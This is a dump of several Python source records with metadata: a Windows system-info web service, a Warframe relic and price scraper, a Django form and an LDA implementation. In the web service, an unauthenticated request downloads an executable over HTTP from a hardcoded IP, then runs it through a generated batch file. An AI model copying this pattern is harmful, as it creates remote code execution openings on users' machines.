39, "usage_type": "name"}, {"api_name": "asyncio.get_event_loop", "line_number": 46, "usage_type": "call"}, {"api_name": "spaceking.net.EVT_PACKET_SEND", "line_number": 72, "usage_type": "attribute"}, {"api_name": "spaceking.net", "line_number": 72, "usage_type": "name"}, {"api_name": "tempfile.mkdtemp", "line_number": 75, "usage_type": "call"}, {"api_name": "spaceking.common.CONFIG_HOME", "line_number": 75, "usage_type": "attribute"}, {"api_name": "spaceking.common", "line_number": 75, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 77, "usage_type": "call"}, {"api_name": "os.path", "line_number": 77, "usage_type": "attribute"}, {"api_name": "spaceking.net.NetEvent", "line_number": 84, "usage_type": "call"}, {"api_name": "spaceking.net", "line_number": 84, "usage_type": "name"}, {"api_name": "spaceking.net.EVT_PACKET_RECV", "line_number": 84, "usage_type": "attribute"}, {"api_name": "asyncio.Task", "line_number": 88, "usage_type": "call"}, {"api_name": "spaceking.log.warn", "line_number": 121, "usage_type": "call"}, {"api_name": "spaceking.log", "line_number": 121, "usage_type": "name"}, {"api_name": "spaceking.net.NetEvent", "line_number": 126, "usage_type": "call"}, {"api_name": "spaceking.net", "line_number": 126, "usage_type": "name"}, {"api_name": "spaceking.log.info", "line_number": 127, "usage_type": "call"}, {"api_name": "spaceking.log", "line_number": 127, "usage_type": "name"}, {"api_name": "asyncio.coroutine", "line_number": 115, "usage_type": "attribute"}, {"api_name": "socket.error", "line_number": 136, "usage_type": "attribute"}, {"api_name": "spaceking.log.debug", "line_number": 137, "usage_type": "call"}, {"api_name": "spaceking.log", "line_number": 137, "usage_type": "name"}, {"api_name": "asyncio.coroutine", "line_number": 129, "usage_type": "attribute"}, {"api_name": "spaceking.net.NetEvent", "line_number": 144, "usage_type": "call"}, {"api_name": "spaceking.net", "line_number": 144, "usage_type": "name"}, {"api_name": "asyncio.Task", "line_number": 146, "usage_type": "call"}, {"api_name": "spaceking.log.debug", "line_number": 155, "usage_type": "call"}, {"api_name": "spaceking.log", "line_number": 155, "usage_type": "name"}, {"api_name": "spaceking.log.info", "line_number": 157, "usage_type": "call"}, {"api_name": "spaceking.log", "line_number": 157, "usage_type": "name"}, {"api_name": "spaceking.log.error", "line_number": 164, "usage_type": "call"}, {"api_name": "spaceking.log", "line_number": 164, "usage_type": "name"}, {"api_name": "asyncio.start_server", "line_number": 168, "usage_type": "call"}, {"api_name": "spaceking.net.SERVER_PORT", "line_number": 171, "usage_type": "attribute"}, {"api_name": "spaceking.net", "line_number": 171, "usage_type": "name"}, {"api_name": "shutil.rmtree", "line_number": 176, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 176, "usage_type": "call"}, {"api_name": "os.path", "line_number": 176, "usage_type": "attribute"}, {"api_name": "spaceking.log.debug", "line_number": 177, "usage_type": "call"}, {"api_name": "spaceking.log", "line_number": 177, "usage_type": "name"}, {"api_name": "atexit.register", "line_number": 179, "usage_type": "call"}, {"api_name": "asyncio.start_unix_server", "line_number": 180, "usage_type": "call"}, {"api_name": "spaceking.log.info", "line_number": 187, "usage_type": "call"}, {"api_name": "spaceking.log", "line_number": 187, "usage_type": "name"}, {"api_name": "spaceking.net.NetEvent", "line_number": 188, "usage_type": "call"}, {"api_name": "spaceking.net", "line_number": 188, "usage_type": "name"}, {"api_name": "spaceking.log.debug", "line_number": 191, "usage_type": "call"}, {"api_name": "spaceking.log", "line_number": 191, "usage_type": "name"}, {"api_name": "spaceking.net.NetEvent", "line_number": 195, "usage_type": "call"}, {"api_name": "spaceking.net", "line_number": 195, "usage_type": "name"}, {"api_name": "spaceking.log.debug", "line_number": 197, "usage_type": "call"}, {"api_name": "spaceking.log", "line_number": 197, "usage_type": "name"}]}
+{"seq_id": "194247979", "text": "# coding:utf-8\n\nimport logging\nimport psutil \nimport time\nimport json\nimport winreg\nimport requests\nimport os\nimport subprocess\nimport globalvar as gl\nfrom urllib.parse import parse_qs\n\n\nlogging.basicConfig(level=logging.DEBUG,format=' %(asctime)s - %(levelname)s - %(message)s')\n#logging.disable(logging.CRITICAL) # 加这句话,就是log全部禁止,不加,就可以log打印了\n\n\n\n# 定义函数,两个参数,都是python本身定义的,默认就行了。\ndef application(environ, start_response):\n \n recordLog('start in webapi')\n # 定义文件请求的类型和当前请求成功的code\n try:\n start_response('200 OK', [('Content-Type', 'application/json;charset=utf-8')])\n d = parse_qs(environ['QUERY_STRING'])\n recordLog(environ['QUERY_STRING'])\n key = d.get('key', [''])[0] # 返回第一个age值.\n recordLog(key)\n except Exception as err:\n recordLog('web err!')\n recordLog(str(err))\n \n \n\n # 获取服务器的硬件运行信息\n if key=='getinfo':\n info=sysInfo()\n json_str = json.dumps(info,ensure_ascii=False,indent=4)\n recordLog('record getinfo')\n recordLog(json.dumps(json_str))\n return [json_str.encode('utf-8')]\n \n # 主动触发服务器下载最新版的热更新\n elif key=='download':\n info = {\"status\": \"download\"}\n try:\n res =requests.get(r'http://47.75.120.191:83/PCInfoService.exe',timeout=30)\n except Exception as err:\n info = {\"status\":str(err)}\n recordLog(str(err))\n\n down=os.path.join(getPath(),'PCInfoService.exe')\n\n try:\n downloadFile = open(down,'wb')\n for chunk in res.iter_content(100000):\n downloadFile.write(chunk)\n #recordLog(os.path.getsize(downloadFile))\n downloadFile.close()\n info = {\"status\":\"download finish\"}\n\n recordLog(\"download finish\")\n \n WriteRestartCmd()\n recordLog(\"update Start\")\n recordLog(\"shutdown\")\n \n except Exception as err:\n recordLog(str(err))\n info = {\"status\":str(err)}\n \n finally:\n return [json_str.encode('utf-8')]\n \n else:\n logging.debug('Noget')\n info = {\"status\": \"none\"}\n json_str = json.dumps(info,ensure_ascii=False,indent=4)\n return [json_str.encode('utf-8')]\n \n#编写bat脚本,删除旧程序,运行新程序\ndef WriteRestartCmd():\n os.chdir(getPath())\n b = open(\"upgrade.bat\",'w')\n TempList = \"@echo off\\n\"; #关闭bat脚本的输出\n TempList += \"if not exist pcinfoservice.exe exit \\n\"; #新文件不存在,退出脚本执行\n TempList += \"sc stop pcinfo \\n\" \n TempList += \"ping /n 5 127.1>nul \\n\" #5秒后删除旧程序(3秒后程序已运行结束,不延时的话,会提示被占用,无法删除)\n TempList += \"del PCInfo.exe /q \\n\"\n TempList += \"ren PCInfoService.exe PCInfo.exe \\n\"\n TempList += \"pcinfo.exe install \\n\"\n TempList += \"sc start pcinfo \\n\"\n TempList += \"sc config pcinfo start= auto\" \n b.write(TempList)\n b.close()\n subprocess.Popen(\"upgrade.bat\")\n\n\ndef recordLog(strmsg): #把strmsg写入日志\n \n os.chdir(getPath())\n try:\n logFile = open(r'web.log','a')\n logFile.write(get_time_stamp()+' ') #写入日志\n logFile.write(strmsg+'\\n')\n except Exception as err:\n logFile.write(get_time_stamp()+' ') #写入日志\n logFile.write('write web.log err!\\n')\n pass\n finally:\n logFile.close()\n return\n\ndef sysInfo():\n info={}\n \n line={}\n try:\n line.setdefault('CPU核心',str(psutil.cpu_count()))\n line.setdefault('CPU利用率',str(int(psutil.cpu_percent())) + '%')\n info['CPU']=line\n\n line={}\n line.setdefault('空闲内存G',str(round(psutil.virtual_memory().free/(1024.0*1024.0*1024.0), 2)))\n line.setdefault('总内存G',str(int(round(psutil.virtual_memory().total/(1024.0*1024.0*1024.0)))))\n line.setdefault('内存利用率',str(int((psutil.virtual_memory().total-psutil.virtual_memory().free)/float(psutil.virtual_memory().total)*100))+ '%')\n info['Memory'] =line\n \n line={}\n \n io = psutil.disk_partitions()\n j=0\n except Exception as err:\n recordLog(str(err))\n\t\n for i in io:\n diskstr=[]\n try:\n o = psutil.disk_usage(i.device)\n except Exception as err:\n recordLog(str(err))\n j=j+1\n continue\n \n disk=io[j][0].strip(r':\\\\')\n diskstr.append(str(int(o.free/(1024.0*1024.0*1024.0)))+\"G\")\n diskstr.append(str(int(o.total/(1024.0*1024.0*1024.0)))+\"G\") \n line.setdefault(disk,diskstr)\n del(diskstr)\n j=j+1\n\n info['Disk']=line\n try:\n info.setdefault('version',gl.getvalue('version'))\n except Exception as err:\n recordLog(\"version write err\")\n \n return info\n\ndef getPath():\n #获取服务执行程序的路径\n try:\n key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE,r\"SYSTEM\\CurrentControlSet\\Services\\PCInfo\")\n downloadPath =winreg.QueryValueEx(key,\"ImagePath\")\n path=os.path.dirname(downloadPath[0][1:])\n except Exception as err:\n path=r'c:\\windows\\system32'\n recordLog('Path change err: '+ str(err))\n return path\n\n\ndef get_time_stamp():\n ct = time.time()\n local_time = time.localtime(ct)\n data_head = time.strftime(\"%Y-%m-%d %H:%M:%S\", local_time)\n data_secs = (ct - int(ct)) * 1000\n time_stamp = \"%s.%03d\" % (data_head, data_secs)\n return time_stamp\n", "sub_path": "python-book01/2018/2018-07/PChealth/pc_info_windowsService/WebAPI.py", "file_name": "WebAPI.py", "file_ext": "py", "file_size_in_byte": 5748, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "logging.basicConfig", "line_number": 15, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 15, "usage_type": "attribute"}, {"api_name": "urllib.parse.parse_qs", "line_number": 27, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 40, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 42, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 49, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 54, "usage_type": "call"}, {"api_name": "os.path", "line_number": 54, "usage_type": "attribute"}, {"api_name": "logging.debug", "line_number": 78, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 80, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 85, "usage_type": "call"}, {"api_name": "subprocess.Popen", "line_number": 98, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 103, "usage_type": "call"}, {"api_name": "psutil.cpu_count", "line_number": 121, "usage_type": "call"}, {"api_name": "psutil.cpu_percent", "line_number": 122, "usage_type": "call"}, {"api_name": "psutil.virtual_memory", "line_number": 126, "usage_type": "call"}, {"api_name": "psutil.virtual_memory", "line_number": 127, "usage_type": "call"}, {"api_name": "psutil.virtual_memory", "line_number": 128, "usage_type": "call"}, {"api_name": "psutil.disk_partitions", "line_number": 133, "usage_type": "call"}, {"api_name": "psutil.disk_usage", "line_number": 141, "usage_type": "call"}, {"api_name": "globalvar.getvalue", "line_number": 156, "usage_type": "call"}, {"api_name": "winreg.OpenKey", "line_number": 165, "usage_type": "call"}, {"api_name": "winreg.HKEY_LOCAL_MACHINE", "line_number": 165, "usage_type": "attribute"}, {"api_name": "winreg.QueryValueEx", "line_number": 166, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 167, "usage_type": "call"}, {"api_name": "os.path", "line_number": 167, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 175, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 176, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 177, "usage_type": "call"}]}
+{"seq_id": "570612328", "text": "# Install python 3, duh!\n# Run the command below in a cmd window to install the needed packages, without the #, duh!\n# pip install bs4 requests pandas openpyxl lxml html5lib\n# Run the python file with the included batch file, DUH!\n\ntry:\n # Error handling if something happens during script initialisation\n from csv import QUOTE_ALL # Needed to export data to CSV\n from bs4 import BeautifulSoup # Needed to parse the dynamic webpage of the Ducanator\n from requests import get # Needed to get the webpage of the Ducanator\n from re import search # Needed to find the json string to import into pandas\n from pandas import read_csv, set_option, concat, DataFrame, read_json, read_html, ExcelWriter # Needed to convert the json string into a usable dataframe object for manipulation\n from traceback import format_exc # Needed for more friendly error messages.\n from openpyxl import load_workbook\n from numpy import arange\n from os import path\nexcept ModuleNotFoundError:\n print('OOPSIE WOOPSIE!! Uwu We made a fucky wucky!! A wittle fucko boingo! The code monkeys at our headquarters are working VEWY HAWD to fix this!')\n print('You didn\\'t install the packages like I told you to. Please run \\\"pip install bs4 requests pandas\\\" in a cmd window to install the required packages!')\n print('\\033[1;31m' + format_exc())\n exit(1)\n\ntry:\n #User Variables\n workbook_name = 'Prime_Relic_Data.xlsx'\n csv_name = 'Prime-Relic Data.csv'\n sheet_name_day = 'Day'\n sheet_name_hour = 'Hour'\n sheet_name_relic = 'Relic_Data'\n retry_attempts = 10\n # Sets the URL to scrape, because hard-coding is bad\n print('Downloading Ducat Data')\n url_ducats = \"https://warframe.market/tools/ducats\"\n # Scrapes the given URL\n soup = str(BeautifulSoup(get(url_ducats).content, \"html.parser\")).replace('\\n', '')\n print('Ducat Data Downloaded')\n print('Processing Ducat Data')\n # Finds the needed json string for item data, previous hour data, and previous day data.\n # Slices off the first bit to make a valid json string for pandas later\n items = search('\"items\": (\\[(?:\\[??[^\\[]*?\\]))', soup).group(0)[9:]\n previous_hour = search('\"previous_hour\": (\\[(?:\\[??[^\\[]*?\\]))', soup).group(0)[17:]\n previous_day = search('\"previous_day\": (\\[(?:\\[??[^\\[]*?\\]))', soup).group(0)[16:]\n\n # Reads and sanitises the item data into a pandas dataframe\n df_items = read_json(items)\n df_items = df_items.drop(columns=['url_name', 'thumb'])\n df_items = df_items.reindex(columns=['id', 'item_name'])\n\n # Reads and sanitises the previous day data into a pandas dataframe\n df_previous_day = read_json(previous_day)\n df_previous_day = df_previous_day.drop(columns=['id', 'plat_worth', 'median'])\n df_previous_day = df_previous_day.rename(columns={'item': 'id'})\n # Merges the item data and previous day data on the id column, drops the redundant id column, then renames the column names for export\n df_previous_day_merged = df_items.merge(df_previous_day, how='inner', on='id')\n df_previous_day_merged = df_previous_day_merged.drop(columns=['id'])\n df_previous_day_merged = df_previous_day_merged.reindex(columns=['item_name', 'datetime', 'ducats_per_platinum', 'ducats', 'wa_price','ducats_per_platinum_wa', 'position_change_month', 'position_change_week', 'position_change_day', 'volume'])\n df_previous_day_merged = df_previous_day_merged.sort_values(by='item_name')\n df_previous_day_merged['datetime'] = df_previous_day_merged['datetime'].astype(str).str[:-6]\n\n # Reads and sanitises the previous hour data into a pandas dataframe\n df_previous_hour = read_json(previous_hour)\n df_previous_hour = df_previous_hour.drop(columns=['id', 'plat_worth', 'median'])\n df_previous_hour = df_previous_hour.rename(columns={'item': 'id'})\n # Merges the item data and previous hour data on the id column, drops the redundant id column, then renames the column names for export\n df_previous_hour_merged = df_items.merge(df_previous_hour, how='inner', on='id')\n df_previous_hour_merged = df_previous_hour_merged.drop(columns=['id'])\n df_previous_hour_merged = df_previous_hour_merged.reindex(columns=['item_name', 'datetime', 'ducats_per_platinum', 'ducats', 'wa_price','ducats_per_platinum_wa', 'position_change_month', 'position_change_week', 'position_change_day', 'volume'])\n df_previous_hour_merged = df_previous_hour_merged.sort_values(by='item_name')\n df_previous_hour_merged['datetime'] = df_previous_hour_merged['datetime'].astype(str).str[:-6]\n df_previous_hour_merged = df_previous_hour_merged.reset_index(drop=True)\n\n print('Ducat Data Processed')\n # Fuck Comments\n print('Downloading Relic Data')\n url_relics = \"https://n8k6e2y6.ssl.hwcdn.net/repos/hnfvc0o3jnfvc873njb03enrf56.html\"\n relic_data_txt_name = 'RelicData.txt'\n\n if path.isfile(relic_data_txt_name):\n with open(relic_data_txt_name) as f:\n soup = str(f.readlines())\n print(\"Loaded Local Relic Data\")\n else:\n print(\"Loading Remote Item Data\")\n\n for x in range(0, retry_attempts):\n try:\n soup = str(BeautifulSoup(get(url_relics).content, \"html.parser\")).replace('\\n', '')\n print('Saving Local Data')\n with open(relic_data_txt_name, 'w') as f:\n f.write(soup)\n break\n except Exception:\n print('Relic data download failed, retrying... ' + str(retry_attempts - x - 1) + ' attempts left...', end='\\r')\n\n\n print('Relic Data Downloaded')\n print('Processing Relic Data')\n parsed_relics = search('Relics:
', soup).group(0)[34:].replace('th>', 'td>').replace(r'', r' | ').replace('X Kuva', 'x Kuva')\n df_parsed_relics = read_html(parsed_relics, header=None)\n df_parsed_relics = df_parsed_relics[0].replace(to_replace=r'.+\\((.+)\\%\\)', value=r'\\1', regex=True)\n df_parsed_relics[1] = df_parsed_relics[1].astype(float)\n df_parsed_relics = df_parsed_relics.dropna(how='all').fillna(999)\n groups = df_parsed_relics.groupby(arange(len(df_parsed_relics.index)) // 7, sort=False).apply(lambda x: x.sort_values(by=1, ascending=False))\n groups[1] = ' (' + groups[1].astype(str) + '%)'\n groups = groups[0] + groups[1]\n groups = groups.replace(to_replace=r'\\(999.0\\%\\)', value=r'', regex=True)\n templist = []\n templist2 = []\n for count, value in enumerate(groups):\n if count % 7 == 0 and count != 0:\n templist2.append(templist)\n templist = []\n templist.append(value)\n df_even_more_parsed_relics = DataFrame(templist2, columns=['Relic_Name', 'C1', 'C2', 'C3', 'U1', 'U2', 'Rare'])\n df_relic_class = df_even_more_parsed_relics['Relic_Name'].str.split().str[0]\n df_even_more_parsed_relics.insert(len(df_even_more_parsed_relics.columns), 'Class', df_relic_class, allow_duplicates=True)\n df_even_more_parsed_relics.insert(len(df_even_more_parsed_relics.columns), 'Type', df_even_more_parsed_relics['Relic_Name'].str.upper().str.split().str[1], allow_duplicates=True)\n df_even_more_parsed_relics.insert(len(df_even_more_parsed_relics.columns), 'Refinement', df_even_more_parsed_relics['Relic_Name'].str.split().str[3].replace(to_replace=r'[\\(\\)]', value=r'', regex=True), allow_duplicates=True)\n dict = {'Exceptional':'','Flawless':'','Radiant':''}\n df_even_more_parsed_relics.insert(len(df_even_more_parsed_relics.columns), 'C1_Raw', df_even_more_parsed_relics['C1'].replace(to_replace=r' \\(.+\\)',value='',regex=True))\n df_even_more_parsed_relics.insert(len(df_even_more_parsed_relics.columns), 'C2_Raw', df_even_more_parsed_relics['C2'].replace(to_replace=r' \\(.+\\)',value='',regex=True))\n df_even_more_parsed_relics.insert(len(df_even_more_parsed_relics.columns), 'C3_Raw', df_even_more_parsed_relics['C3'].replace(to_replace=r' \\(.+\\)',value='',regex=True))\n df_even_more_parsed_relics.insert(len(df_even_more_parsed_relics.columns), 'U1_Raw', df_even_more_parsed_relics['U1'].replace(to_replace=r' \\(.+\\)',value='',regex=True))\n df_even_more_parsed_relics.insert(len(df_even_more_parsed_relics.columns), 'U2_Raw', df_even_more_parsed_relics['U2'].replace(to_replace=r' \\(.+\\)',value='',regex=True))\n df_even_more_parsed_relics.insert(len(df_even_more_parsed_relics.columns), 'Rare_Raw', df_even_more_parsed_relics['Rare'].replace(to_replace=r' \\(.+\\)',value='',regex=True))\n df_even_more_parsed_relics.insert(len(df_even_more_parsed_relics.columns), 'C1_Odds', df_even_more_parsed_relics['C1'].replace(to_replace=r'.+\\((.+)\\%\\)',value=r'\\1',regex=True).astype(float))\n df_even_more_parsed_relics.insert(len(df_even_more_parsed_relics.columns), 'C2_Odds', df_even_more_parsed_relics['C2'].replace(to_replace=r'.+\\((.+)\\%\\)',value=r'\\1',regex=True).astype(float))\n df_even_more_parsed_relics.insert(len(df_even_more_parsed_relics.columns), 'C3_Odds', df_even_more_parsed_relics['C3'].replace(to_replace=r'.+\\((.+)\\%\\)',value=r'\\1',regex=True).astype(float))\n df_even_more_parsed_relics.insert(len(df_even_more_parsed_relics.columns), 'U1_Odds', df_even_more_parsed_relics['U1'].replace(to_replace=r'.+\\((.+)\\%\\)',value=r'\\1',regex=True).astype(float))\n df_even_more_parsed_relics.insert(len(df_even_more_parsed_relics.columns), 'U2_Odds', df_even_more_parsed_relics['U2'].replace(to_replace=r'.+\\((.+)\\%\\)',value=r'\\1',regex=True).astype(float))\n df_even_more_parsed_relics.insert(len(df_even_more_parsed_relics.columns), 'Rare_Odds', df_even_more_parsed_relics['Rare'].replace(to_replace=r'.+\\((.+)\\%\\)',value=r'\\1',regex=True).astype(float))\n df_even_more_parsed_relics = df_even_more_parsed_relics.replace(to_replace=r'Systems Blueprint',value=r'Systems', regex=True)\n df_even_more_parsed_relics = df_even_more_parsed_relics.replace(to_replace=r'Neuroptics Blueprint',value=r'Neuroptics', regex=True)\n df_even_more_parsed_relics = df_even_more_parsed_relics.replace(to_replace=r'Chassis Blueprint',value=r'Chassis', regex=True)\n #print(df_even_more_parsed_relics.head(5))\n #df_even_more_parsed_relics['Relic_Name'] = df_even_more_parsed_relics['Relic_Name'].str.split(n=1).str[1]\n #df_axi = df_even_more_parsed_relics[df_even_more_parsed_relics['Relic_Class']=='Axi'].reset_index(drop=True)\n #df_lith = df_even_more_parsed_relics[df_even_more_parsed_relics['Relic_Class']=='Lith'].reset_index(drop=True)\n #df_meso = df_even_more_parsed_relics[df_even_more_parsed_relics['Relic_Class']=='Meso'].reset_index(drop=True)\n #df_neo = df_even_more_parsed_relics[df_even_more_parsed_relics['Relic_Class']=='Neo'].reset_index(drop=True)\n #df_requiem = df_even_more_parsed_relics[df_even_more_parsed_relics['Relic_Class']=='Requiem'].reset_index(drop=True)\n #df_final_export_relic = concat([df_axi,df_lith,df_meso,df_neo,df_requiem], axis=1, ignore_index=True)\n #print(df_even_more_parsed_relics)\n print('Relic Data Processed')\n\n # Export data\n print('Exporting Worksheet')\n df_even_more_parsed_relics.to_csv(csv_name, index=None, quoting=QUOTE_ALL)\n df_previous_day_merged.to_csv('DayPrices.csv', index=None, quoting=QUOTE_ALL)\n with ExcelWriter(workbook_name, mode='a', engine='openpyxl', if_sheet_exists='replace') as writer:\n df_previous_day_merged.to_excel(writer, sheet_name=sheet_name_day)\n df_previous_hour_merged.to_excel(writer, sheet_name=sheet_name_hour)\n df_even_more_parsed_relics.to_excel(writer, sheet_name=sheet_name_relic)\n #df_final_export_relic.to_excel(writer, sheet_name=sheet_name_relic)\n book = load_workbook(workbook_name)\n sheet = book[sheet_name_day]\n sheet.delete_cols(1,1)\n sheet = book[sheet_name_hour]\n sheet.delete_cols(1,1)\n sheet = book[sheet_name_relic]\n sheet.delete_cols(1,1)\n book.save(workbook_name)\n print('If you see this message, things should have worked correctly. Remove the \\\"pause\\\" from the batch script to automatically close this window after use.')\n\nexcept Exception:\n # Error handling if something happens during the main script\n print('OOPSIE WOOPSIE!! Uwu We made a fucky wucky!! A wittle fucko boingo! The code monkeys at our headquarters are working VEWY HAWD to fix this!')\n print('\\033[1;31m' + format_exc())\n exit(1)\n", "sub_path": "Scrape the Ducanator.py", "file_name": "Scrape the Ducanator.py", "file_ext": "py", "file_size_in_byte": 12314, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "traceback.format_exc", "line_number": 20, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 35, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 35, "usage_type": "call"}, {"api_name": "re.search", "line_number": 40, "usage_type": "call"}, {"api_name": "re.search", "line_number": 41, "usage_type": "call"}, {"api_name": "re.search", "line_number": 42, "usage_type": "call"}, {"api_name": "pandas.read_json", "line_number": 45, "usage_type": "call"}, {"api_name": "pandas.read_json", "line_number": 50, "usage_type": "call"}, {"api_name": "pandas.read_json", "line_number": 61, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 78, "usage_type": "call"}, {"api_name": "os.path", "line_number": 78, "usage_type": "name"}, {"api_name": "bs4.BeautifulSoup", "line_number": 87, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 87, "usage_type": "call"}, {"api_name": "re.search", "line_number": 98, "usage_type": "call"}, {"api_name": "pandas.read_html", "line_number": 99, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 103, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 114, "usage_type": "call"}, {"api_name": "csv.QUOTE_ALL", "line_number": 148, "usage_type": "name"}, {"api_name": "csv.QUOTE_ALL", "line_number": 149, "usage_type": "name"}, {"api_name": "pandas.ExcelWriter", "line_number": 150, "usage_type": "call"}, {"api_name": "openpyxl.load_workbook", "line_number": 155, "usage_type": "call"}, {"api_name": "traceback.format_exc", "line_number": 168, "usage_type": "call"}]}
+{"seq_id": "413518482", "text": "from .models import User\nfrom django import forms\n\nclass UserForm(forms.ModelForm):\n class Meta:\n # specify model to be used\n model = User\n\n # specify fields to be used\n fields = [\n \"first_name\",\n \"second_name\",\n ]", "sub_path": "students/y2333/practical_works/Gordienko_Maxim/Practice 2/forms.py", "file_name": "forms.py", "file_ext": "py", "file_size_in_byte": 282, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "django.forms.ModelForm", "line_number": 4, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 4, "usage_type": "name"}, {"api_name": "models.User", "line_number": 7, "usage_type": "name"}]}
+{"seq_id": "167001807", "text": "\"\"\"\nSimple implementation of (Fisher's) Linear Discriminant Analysis.\nThanks to: https://www.python-course.eu/linear_discriminant_analysis.php\n\nThe L. D. Matrix is a transformation matrix which best separates\nthe instances of different classes in data projection.\n\"\"\"\nimport numpy as np\n\n\nclass LDA:\n def fit(self, X, y):\n \"\"\"Fit dataset into LDA model.\"\"\"\n self.X = np.array(X)\n self.y = np.array(y)\n\n self.classes, self.cls_freqs = np.unique(y, return_counts=True)\n\n def _scatter_within(self):\n \"\"\"This measure describes how scattered are each class.\"\"\"\n scatter_within = np.array([\n (cls_freq - 1) * np.cov(self.X[self.y == cls, :], rowvar=False)\n for cls, cls_freq in zip(self.classes, self.cls_freqs)\n ]).sum(axis=0)\n\n return scatter_within\n\n def _scatter_between(self):\n \"\"\"This measure describes the separation between different classes.\"\"\"\n class_means = np.array(\n [self.X[self.y == cls, :].mean(axis=0) for cls in self.classes])\n\n total_mean = self.X.mean(axis=0)\n\n scatter_factor = class_means - total_mean\n\n scatter_between = np.array([\n freq * np.outer(sf, sf)\n for freq, sf in zip(self.cls_freqs, scatter_factor)\n ]).sum(axis=0)\n\n return scatter_between\n\n def _get_eig(self, sw, sb):\n \"\"\"Get eigenval/vec from (ScatterWithin)^(-1)*(ScatterBetween) mat.\"\"\"\n sw_inv = np.linalg.inv(sw)\n\n return np.linalg.eig(np.matmul(sw_inv, sb))\n\n def _project(self, eig, num_dim):\n \"\"\"Get the K (``num_dim``) most expressive eigenvalues/vectors.\"\"\"\n eig_vals, eig_vecs = eig\n\n eig_vals, eig_vecs = zip(\n *sorted(\n zip(eig_vals, eig_vecs),\n key=lambda item: item[0],\n reverse=True)[:num_dim])\n\n return eig_vals, eig_vecs\n\n def predict(self, max_dim=2):\n \"\"\"Create transf. matrix which best separates the fitted data proj.\"\"\"\n sw = self._scatter_within()\n sb = self._scatter_between()\n\n max_dim = min(max_dim, self.classes.size-1)\n\n eig = self._get_eig(sw, sb)\n\n eig_vals, eig_vecs = self._project(eig, num_dim=max_dim)\n\n _, num_col = self.X.shape\n\n self.eig_vals = np.array(eig_vals)\n self.transf_mat = np.concatenate(eig_vecs).reshape(num_col, max_dim)\n\n self.transf_mat = self.transf_mat.real\n\n return self.transf_mat\n\n def wilks_lambda(self):\n \"\"\"Compute Wilks' Lambda measure using eigenvalues of L. D. matrix.\"\"\"\n return np.prod(1.0 / (1.0 + self.eig_vals))\n\n def canonical_corr(self):\n \"\"\"Calculate canonical correlation values from L. D. matrix.\"\"\"\n return (self.eig_vals / (1.0 + self.eig_vals))**0.5\n\n\nif __name__ == \"__main__\":\n from sklearn import datasets\n iris = datasets.load_iris()\n\n model = LDA()\n model.fit(iris.data, iris.target)\n ans = model.predict(max_dim=2)\n\n print(\"Transformation Matrix:\", ans, sep=\"\\n\", end=\"\\n\\n\")\n print(\"Eigenvalues of L. D. matrix:\", model.eig_vals, end=\"\\n\\n\")\n print(\"Canonical Correlation:\", model.canonical_corr(), end=\"\\n\\n\")\n print(\"Wilks' Lambda:\", model.wilks_lambda())\n", "sub_path": "model-implementation/py-linear-disc-analysis/lda.py", "file_name": "lda.py", "file_ext": "py", "file_size_in_byte": 3243, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "numpy.array", "line_number": 14, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 17, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 21, "usage_type": "call"}, {"api_name": "numpy.cov", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.outer", "line_number": 38, "usage_type": "call"}, {"api_name": "numpy.linalg.inv", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 46, "usage_type": "attribute"}, {"api_name": "numpy.linalg.eig", "line_number": 48, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 48, "usage_type": "attribute"}, {"api_name": "numpy.matmul", "line_number": 48, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 75, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 76, "usage_type": "call"}, {"api_name": "numpy.prod", "line_number": 84, "usage_type": "call"}, {"api_name": "sklearn.datasets.load_iris", "line_number": 93, "usage_type": "call"}, {"api_name": "sklearn.datasets", "line_number": 93, "usage_type": "name"}]}
